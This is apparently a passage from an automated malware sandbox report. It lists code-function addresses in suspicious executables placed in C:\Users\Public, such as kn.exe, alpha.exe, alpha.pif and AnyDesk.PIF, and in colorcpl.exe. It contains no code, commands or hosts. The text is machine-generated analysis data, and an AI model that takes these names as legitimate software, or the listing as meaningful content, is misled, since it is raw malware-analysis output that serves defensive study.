                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1C1D06_2_00007FF6A2A1C1D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8821C6_2_00007FF6A2A8821C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AD41F86_2_00007FF6A2AD41F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C81706_2_00007FF6A29C8170
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E01406_2_00007FF6A29E0140
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA42746_2_00007FF6A2AA4274
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1E29C6_2_00007FF6A2A1E29C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E227C6_2_00007FF6A29E227C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A362806_2_00007FF6A2A36280
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4C7F06_2_00007FF6A2A4C7F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A427D06_2_00007FF6A2A427D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A707D06_2_00007FF6A2A707D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB67506_2_00007FF6A2AB6750
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA08C86_2_00007FF6A2AA08C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA48C46_2_00007FF6A2AA48C4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB28546_2_00007FF6A2AB2854
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4E8446_2_00007FF6A2A4E844
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D05E06_2_00007FF6A29D05E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC85EC6_2_00007FF6A2AC85EC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8C6306_2_00007FF6A2A8C630
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A286306_2_00007FF6A2A28630
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F85706_2_00007FF6A29F8570
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2655C6_2_00007FF6A2A2655C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A945386_2_00007FF6A2A94538
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB85A86_2_00007FF6A2AB85A8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5E57C6_2_00007FF6A2A5E57C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A125806_2_00007FF6A2A12580
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2C6D06_2_00007FF6A2A2C6D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3C6F86_2_00007FF6A2A3C6F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A38BD46_2_00007FF6A2A38BD4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A10C286_2_00007FF6A2A10C28
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0CBFC6_2_00007FF6A2A0CBFC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CAC086_2_00007FF6A29CAC08
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E4B686_2_00007FF6A29E4B68
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A76B946_2_00007FF6A2A76B94
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB8CF46_2_00007FF6A2AB8CF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A18D2C6_2_00007FF6A2A18D2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A22D186_2_00007FF6A2A22D18
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D8D006_2_00007FF6A29D8D00
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1CD106_2_00007FF6A2A1CD10
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A52CF86_2_00007FF6A2A52CF8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A98C586_2_00007FF6A2A98C58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5CCA86_2_00007FF6A2A5CCA8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACCC8C6_2_00007FF6A2ACCC8C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3CC806_2_00007FF6A2A3CC80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A9F06_2_00007FF6A2A9A9F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A209EC6_2_00007FF6A2A209EC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2E9F06_2_00007FF6A2A2E9F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4AA006_2_00007FF6A2A4AA00
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C29406_2_00007FF6A29C2940
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A189906_2_00007FF6A2A18990
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A269846_2_00007FF6A2A26984
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A14B306_2_00007FF6A2A14B30
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AAAA586_2_00007FF6A2AAAA58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB4A586_2_00007FF6A2AB4A58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A94A406_2_00007FF6A2A94A40
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4EA7C6_2_00007FF6A2A4EA7C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A46A846_2_00007FF6A2A46A84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C10306_2_00007FF6A29C1030
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A64F946_2_00007FF6A2A64F94
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F4F906_2_00007FF6A29F4F90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8511C6_2_00007FF6A2A8511C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DB09C6_2_00007FF6A29DB09C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0107C6_2_00007FF6A2A0107C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1D0946_2_00007FF6A2A1D094
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA2D6C6_2_00007FF6A2AA2D6C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EEDA46_2_00007FF6A29EEDA4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A36D7C6_2_00007FF6A2A36D7C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C6EF46_2_00007FF6A29C6EF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FEED46_2_00007FF6A29FEED4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E8F1C6_2_00007FF6A29E8F1C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA4E586_2_00007FF6A2AA4E58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA8EAC6_2_00007FF6A2AA8EAC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB33D06_2_00007FF6A2AB33D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC33D46_2_00007FF6A2AC33D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0F4346_2_00007FF6A2A0F434
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C73F86_2_00007FF6A29C73F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3D4106_2_00007FF6A2A3D410
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EB36C6_2_00007FF6A29EB36C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F73406_2_00007FF6A29F7340
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AAB3AC6_2_00007FF6A2AAB3AC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A914F06_2_00007FF6A2A914F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3F5206_2_00007FF6A2A3F520
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6D4606_2_00007FF6A2A6D460
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C54386_2_00007FF6A29C5438
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0D4406_2_00007FF6A2A0D440
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E54A06_2_00007FF6A29E54A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB94A86_2_00007FF6A2AB94A8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A794946_2_00007FF6A2A79494
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A274786_2_00007FF6A2A27478
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A131E06_2_00007FF6A2A131E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A111C86_2_00007FF6A2A111C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DD1B86_2_00007FF6A29DD1B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F1686_2_00007FF6A2A4F168
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A392D86_2_00007FF6A2A392D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CF2C06_2_00007FF6A29CF2C0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1D2C06_2_00007FF6A2A1D2C0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A292C46_2_00007FF6A2A292C4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A553186_2_00007FF6A2A55318
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9D2B46_2_00007FF6A2A9D2B4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A752906_2_00007FF6A2A75290
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2D7F06_2_00007FF6A2A2D7F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A377C86_2_00007FF6A2A377C8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A017D46_2_00007FF6A2A017D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E18306_2_00007FF6A29E1830
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A738206_2_00007FF6A2A73820
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DF8006_2_00007FF6A29DF800
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A437606_2_00007FF6A2A43760
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A197906_2_00007FF6A2A19790
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DB7886_2_00007FF6A29DB788
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A158CC6_2_00007FF6A2A158CC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A938746_2_00007FF6A2A93874
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5D8586_2_00007FF6A2A5D858
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5184C6_2_00007FF6A2A5184C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A278906_2_00007FF6A2A27890
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A255F06_2_00007FF6A2A255F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A495FC6_2_00007FF6A2A495FC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CF6106_2_00007FF6A29CF610
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F156C6_2_00007FF6A29F156C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A995806_2_00007FF6A2A99580
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FB58C6_2_00007FF6A29FB58C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F6D86_2_00007FF6A2A4F6D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9D6DC6_2_00007FF6A2A9D6DC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29ED6606_2_00007FF6A29ED660
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A956606_2_00007FF6A2A95660
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA36386_2_00007FF6A2AA3638
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A056486_2_00007FF6A2A05648
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A176B06_2_00007FF6A2A176B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A7D6A06_2_00007FF6A2A7D6A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A776786_2_00007FF6A2A77678
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA76786_2_00007FF6A2AA7678
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2DBF06_2_00007FF6A2A2DBF0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E9BC86_2_00007FF6A29E9BC8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FFC206_2_00007FF6A29FFC20
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1FC346_2_00007FF6A2A1FC34
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A73C106_2_00007FF6A2A73C10
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A57B746_2_00007FF6A2A57B74
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A6FB506_2_00007FF6A2A6FB50
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C5BA46_2_00007FF6A29C5BA4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29CFB846_2_00007FF6A29CFB84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A31B846_2_00007FF6A2A31B84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1BCE86_2_00007FF6A2A1BCE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A89CC06_2_00007FF6A2A89CC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F9CD06_2_00007FF6A29F9CD0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FDD206_2_00007FF6A29FDD20
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D5D086_2_00007FF6A29D5D08
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A13C606_2_00007FF6A2A13C60
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DBCA46_2_00007FF6A29DBCA4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACFC906_2_00007FF6A2ACFC90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A41C906_2_00007FF6A2A41C90
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EF9B86_2_00007FF6A29EF9B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C1A106_2_00007FF6A29C1A10
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB994C6_2_00007FF6A2AB994C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB79386_2_00007FF6A2AB7938
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A419AC6_2_00007FF6A2A419AC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4F9906_2_00007FF6A2A4F990
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A27AC86_2_00007FF6A2A27AC8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8BB286_2_00007FF6A2A8BB28
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A79A586_2_00007FF6A2A79A58
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A11A606_2_00007FF6A2A11A60
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3BA486_2_00007FF6A2A3BA48
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F3A406_2_00007FF6A29F3A40
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D7AB46_2_00007FF6A29D7AB4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A280186_2_00007FF6A2A28018
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A79FF86_2_00007FF6A2A79FF8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C1F806_2_00007FF6A29C1F80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2C0B86_2_00007FF6A2A2C0B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F80806_2_00007FF6A29F8080
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A920846_2_00007FF6A2A92084
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D1DE86_2_00007FF6A29D1DE8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A51E2C6_2_00007FF6A2A51E2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F5DF76_2_00007FF6A29F5DF7
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A19D6C6_2_00007FF6A2A19D6C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A21D706_2_00007FF6A2A21D70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A77D706_2_00007FF6A2A77D70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5BDA06_2_00007FF6A2A5BDA0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACDD846_2_00007FF6A2ACDD84
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A49EE46_2_00007FF6A2A49EE4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A11ED06_2_00007FF6A2A11ED0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A55F046_2_00007FF6A2A55F04
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4BE706_2_00007FF6A2A4BE70
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4DEB06_2_00007FF6A2A4DEB0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A1DEA46_2_00007FF6A2A1DEA4
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA20C49_2_02AA20C4
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E37D810_2_00007FF7823E37D8
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D341010_2_00007FF7823D3410
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E785410_2_00007FF7823E7854
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E555410_2_00007FF7823E5554
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D8DF810_2_00007FF7823D8DF8
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823DAA5410_2_00007FF7823DAA54
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D5B7010_2_00007FF7823D5B70
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D3F9010_2_00007FF7823D3F90
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D372C10_2_00007FF7823D372C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D9B5010_2_00007FF7823D9B50
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D6BE010_2_00007FF7823D6BE0
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FAFBC10_2_00007FF7823FAFBC
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D188410_2_00007FF7823D1884
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FAC4C10_2_00007FF7823FAC4C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D2C4810_2_00007FF7823D2C48
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823DB0D810_2_00007FF7823DB0D8
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D851010_2_00007FF7823D8510
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E18D410_2_00007FF7823E18D4
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D7D3010_2_00007FF7823D7D30
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF78240153810_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823DCE1010_2_00007FF7823DCE10
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D81D410_2_00007FF7823D81D4
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FD9D010_2_00007FF7823FD9D0
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E0A6C10_2_00007FF7823E0A6C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823DE68010_2_00007FF7823DE680
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FEE8810_2_00007FF7823FEE88
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E422410_2_00007FF7823E4224
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D222010_2_00007FF7823D2220
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D4A3010_2_00007FF7823D4A30
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823FAA3010_2_00007FF7823FAA30
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D524010_2_00007FF7823D5240
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823DD25010_2_00007FF7823DD250
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D9E5010_2_00007FF7823D9E50
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D765010_2_00007FF7823D7650
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D6EE410_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823F7F0010_2_00007FF7823F7F00
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E37D811_2_00007FF7823E37D8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D341011_2_00007FF7823D3410
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E785411_2_00007FF7823E7854
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E555411_2_00007FF7823E5554
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D8DF811_2_00007FF7823D8DF8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823DAA5411_2_00007FF7823DAA54
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D5B7011_2_00007FF7823D5B70
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D3F9011_2_00007FF7823D3F90
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D372C11_2_00007FF7823D372C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D9B5011_2_00007FF7823D9B50
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D6BE011_2_00007FF7823D6BE0
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FAFBC11_2_00007FF7823FAFBC
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D188411_2_00007FF7823D1884
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FAC4C11_2_00007FF7823FAC4C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D2C4811_2_00007FF7823D2C48
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823DB0D811_2_00007FF7823DB0D8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D851011_2_00007FF7823D8510
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E18D411_2_00007FF7823E18D4
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D7D3011_2_00007FF7823D7D30
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF78240153811_2_00007FF782401538
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823DCE1011_2_00007FF7823DCE10
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D81D411_2_00007FF7823D81D4
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FD9D011_2_00007FF7823FD9D0
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E0A6C11_2_00007FF7823E0A6C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823DE68011_2_00007FF7823DE680
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FEE8811_2_00007FF7823FEE88
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E422411_2_00007FF7823E4224
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D222011_2_00007FF7823D2220
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D4A3011_2_00007FF7823D4A30
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823FAA3011_2_00007FF7823FAA30
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D524011_2_00007FF7823D5240
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823DD25011_2_00007FF7823DD250
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D9E5011_2_00007FF7823D9E50
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D765011_2_00007FF7823D7650
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D6EE411_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823F7F0011_2_00007FF7823F7F00
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_008574B116_2_008574B1
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085540A16_2_0085540A
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00854C1016_2_00854C10
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0086487516_2_00864875
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087419116_2_00874191
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085914416_2_00859144
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087695A16_2_0087695A
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00865A8616_2_00865A86
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087769E16_2_0087769E
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00863EB316_2_00863EB3
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00864EC116_2_00864EC1
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085EE0316_2_0085EE03
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00857A3416_2_00857A34
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00856E5716_2_00856E57
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00873E6616_2_00873E66
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085D66016_2_0085D660
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00860BF016_2_00860BF0
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00856B2016_2_00856B20
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0086074016_2_00860740
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043706A19_2_0043706A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041400519_2_00414005
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043E11C19_2_0043E11C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004541D919_2_004541D9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004381E819_2_004381E8
